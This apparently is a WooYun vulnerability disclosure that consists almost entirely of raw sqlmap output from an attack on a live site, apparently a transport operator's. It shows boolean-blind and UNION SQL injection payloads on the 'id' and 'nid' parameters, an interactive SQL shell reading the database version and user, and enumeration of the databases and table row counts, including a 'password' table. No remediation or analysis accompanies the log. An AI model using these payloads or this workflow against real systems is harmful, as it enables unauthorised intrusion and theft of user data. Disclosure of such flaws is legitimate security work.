WooYun.org

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 183 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=39 AND 8150=8150
    Type: UNION query
    Title: MySQL UNION query (58) - 14 columns
    Payload: id=-5616 UNION ALL SELECT 58,58,58,CONCAT(0x7176716a71,0x43665544657848495770585a49626245726e736b4973776e7344676f456f6d5355686a5062666d70,0x716b707a71),58,58,58,58,58,58,58,58,58,58#
---
web server operating system: Windows
web application technology: PHP 5.4.12, Apache 2.2.22
back-end DBMS: MySQL >= 5.0.0
current user:    'trans@%'
current database:    'testtransisland_en'

GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 227 HTTP(s) requests:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=11' AND 2556=2556 AND 'iEDQ'='iEDQ
---
web server operating system: Windows
web application technology: PHP 5.4.12, Apache 2.2.22
back-end DBMS: MySQL 5
[11:43:10] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select @@version;
[11:43:20] [INFO] fetching SQL SELECT statement query output: 'select @@version'
[11:43:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:43:20] [INFO] retrieved: 5.0.18-nt
select @@version;:    '5.0.18-nt'
sql-shell>

GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 227 HTTP(s) requests:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=3' AND 7197=7197 AND 'UWps'='UWps
---
web server operating system: Windows
web application technology: PHP 5.4.12, Apache 2.2.22
back-end DBMS: MySQL >= 5.0.0
[11:48:48] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select user();
[11:48:59] [INFO] fetching SQL SELECT statement query output: 'select user()'
[11:48:59] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:48:59] [INFO] retrieved: trans@localhost
select user();:    'trans@localhost'
sql-shell>

GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 114 HTTP(s) requests:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=2' AND 3216=3216 AND 'WbEu'='WbEu
    Type: UNION query
    Title: MySQL UNION query (97) - 15 columns
    Payload: nid=2' UNION ALL SELECT CONCAT(0x717a6b7071,0x504566474b53654c7267,0x717a6b6271),97,97,97,97,97,97,97,97,97,97,97,97,97,97#
---
web server operating system: Windows
web application technology: PHP 5.4.12, Apache 2.2.22
back-end DBMS: MySQL 5
[11:52:53] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] testtransisland
[*] testtransisland_cn
[*] testtransisland_en
[*] transisland

Database: testtransisland_en
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| visitor_counter                    | 141597  |
| visitor_counter_servicelist        | 45950   |
| visitor_counter_servicedetails_13  | 25044   |
| visitor_counter_servicedetails_26  | 23937   |
| visitor_counter_servicedetails_101 | 11225   |
| visitor_counter_service21          | 10813   |
| visitor_counter_servicedetails_91  | 6156    |
| visitor_counter_pm                 | 5986    |
| visitor_counter_news               | 4366    |
| visitor_counter_servicedetails_100 | 3486    |
| visitor_counter_hk_visit_spot      | 2879    |
| visitor_counter_servicedetails_97  | 2817    |
| visitor_counter_sz_visit_spot      | 2025    |
| visitor_counter_servicedetails_99  | 1661    |
| visitor_counter_servicedetails_93  | 1531    |
| visitor_counter_servicedetails_90  | 1422    |
| route                              | 68      |
| promotion                          | 19      |
| routenode                          | 15      |
| car                                | 9       |
| banner                             | 8       |
| carprice                           | 6       |
| carnode                            | 5       |
| contactus                          | 5       |
| news                               | 5       |
| park                               | 4       |
| password                           | 4       |
| bannernode                         | 3       |
| bannernode_seq                     | 1       |
| carnode_seq                        | 1       |
| faq                                | 1       |
| faqnode                            | 1       |
| faqnode_seq                        | 1       |
| link                               | 1       |
| linknode                           | 1       |
| linknode_seq                       | 1       |
| newsnode                           | 1       |
| newsnode_seq                       | 1       |
| otherairportbook                   | 1       |
| otherairportbooknode               | 1       |
| otherairportbooknode_seq           | 1       |
| parknode                           | 1       |
| parknode_seq                       | 1       |
| promotionnode                      | 1       |
| promotionnode_seq                  | 1       |
| routenode_seq                      | 1       |
| visitor_counter_servicedetails_1   | 1       |
+------------------------------------+---------+